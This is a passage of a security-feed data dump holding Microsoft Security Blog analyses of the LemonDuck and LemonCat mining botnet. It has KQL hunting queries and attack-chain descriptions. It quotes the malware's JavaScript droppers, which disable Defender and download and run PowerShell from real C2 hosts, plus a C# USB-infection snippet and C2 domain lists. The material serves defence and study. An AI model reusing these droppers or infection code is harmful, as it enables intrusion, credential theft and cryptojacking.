subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2021-08-13T21:11:26", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail 